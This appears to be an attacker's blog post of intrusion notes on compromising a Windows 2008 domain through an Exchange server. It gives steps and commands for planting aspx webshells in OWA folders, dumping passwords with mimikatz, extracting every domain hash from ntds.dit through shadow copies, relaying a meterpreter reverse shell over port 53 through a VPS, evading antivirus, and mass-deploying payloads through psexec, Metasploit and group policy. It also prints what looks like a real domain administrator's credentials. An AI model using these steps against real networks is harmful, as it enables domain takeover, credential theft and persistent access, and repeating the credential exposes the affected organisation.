windows 2008 domain controllers

on under web
2 minute read

0x01 upload backup webshells

1.there exists a webshell upload by someone else:https://xx.oo.xx/owa/auth/error1.aspx
2.webshell in different folder has different privileges
    https://xx.oo.xx/aspnet_client/system_web/2_0_50727/some.aspx      C:\inetpub\wwwroot\> whoami ---> iis apppool\defaultapppool
    https://xx.oo.xx对应C:\inetpub\wwwroot\      目录下(index.html)   iis权限
    https://xx.oo.xx/owa/auth/some.aspx    C:\inetpub\wwwroot\> whoami ---> nt authority\system
    https://xx.oo.xx/owa/对应C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\Owa\ 目录 system权限
3.upload a strong webshell but found "/" error
    aspx大马连接报错"/"解决方法:https://www.asp-muma.com/?post=97
    my way defferent from uppon one:
    create a new folder,create a web.config file with below content:
    --------------------------content------------------------
    <configuration>
        <system.web>
            <customErrors mode="Off"/>
        </system.web>
    </configuration>
    --------------------------end of content----------------
    then upon a strong webshell to my new created folder,found no more error.
4.different parse 
    C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\Owa\xxoo\xxoo\大马.aspx is ok to parse
    C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\Owa\xxoo\xxoo\一句话.aspx is not ok to parse
    C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\Owa\一句话.aspx is ok to parse
    C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\Owa\auth\一句话.aspx is ok to parse
    C:\inetpub\wwwroot\大马.aspx is not ok to parse before my "adding a new web.config" way in upon 3
    C:\inetpub\wwwroot\一句话.aspx is ok to parse,with iis pri

0x02 find domain controllers and dc administrator username & password

https://drops.wooyun.org/tips/421 
    dsquery server(best)
    nslookup -type=SRV _ldap._tcp.baidu.com(baidu.com is a domain name,others should be like xxx.org.xx)
    netdom query fsmo

mimikatz
    log
    privilege::debug
    sekurlsa::logonpasswords

at 23:0 /every:m,t,w,th,f,s,su "d:\1.bat"
d:\1.bat:
"C:\recycler\srclog.exe" -w >> "C:\recycler\test.txt"

0x03 get all hashs in the domain controllers machine

link a:
    https://drops.wooyun.org/tips/6617
link b:
    https://blogs.msdn.microsoft.com/adioltean/2005/01/05/script-recipe-of-the-week-how-to-copy-an-opened-file/
*attention*:
    in link a,the script name to use shadowcopy is vsshadow.exe
    in link b,the script name to use shadowcopy is vshadow.exe
I get vshadow.exe from installing https://www.microsoft.com/en-us/download/confirmation.aspx?id=23490,then search vshadow.exe in the system,this is a quick link:
    https://pan.baidu.com/s/1cMC07W
there are three files:shadowcopy_ntds.bat,quarkspwdump.exe(v0.2b),vshadow.exe
step0:
    upload these three files to target machine's folder,eg. c:\windows\myfolder\
step1:
    shadowcopy_ntds.bat c:\windows\ntds\ntds.dit c:\windows\myfolder\ntds.dit
    (this shadowcopy_ntds.bat is from link b,it can copy any file while the file is being used)
step2:
    esentutl /p /o ntds.dit
step3:
    QuarksPwDump.exe --dump-hash-domain -with-history -nt c:\windows\ntds\ntds.dit -o c:\windows\myfolder\log.txt
    (or quarkspwdump.exe --dump-hash-domain -hist -nt c:\windows\ntds\ntds.dit -o c:\windows\myfolder\log.txt)
    the origin commands from link a is "QuarksPwDump.exe -dhb -hist -nt ntds.dit -o log.txt",which proved wrong with my quarkspwdump.exe file

0x04 get a meterpreter reverse shell

1.found windows firewall is not open on the target,but "in/out rules exists"
2.found reverse port like 200 can not get it successfully
3.can not find why the meterpreter shell can not reverse connecting msf successfully
4.do these to get meterpreter reverse shell
    target:run reverse_shell.exe(set reverse port to 53)
    vps:lcx -listen 300 53
    local pc:msf-->set lport 300-->set rhost vps's ip
5.found 53 is ok
6.better to use shellter to supass avkiller

0x05 批量种马

1>psexec.exe @pc.txt -u ABIMAQ\Administrator -p k78m90 -c c:\recycler\putty.exe
2>msf
    use exploit/windows/smb/psexec
    set EXE::Custom /root/桌面/putty.exe
    set RHOST -> use armitage to choose pc.txt(192.168.11.1,192.168.11.2,etc)
    exploit
    [msf seems better than psexec.exe]
3>empire框架中的new_gpo_immediate_task.py模块
    http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
4>指派登录脚本,关机脚本,启动脚本
    https://technet.microsoft.com/zh-cn/library/cc731684(v=ws.11).aspx
    https://social.technet.microsoft.com/Forums/ru-RU/d14a3017-8ad8-4f89-a3ea-7b93fcfa3271?forum=windowsserversystemzhchs
5>msf生成msi后用组策略管理编辑器添加安装msi的动作,详情如下图

doamin controllers, inside network, aspx, exchange server, outlook
Since March 2016 the 3xp10it.cc has been running
home
github
search
archive
category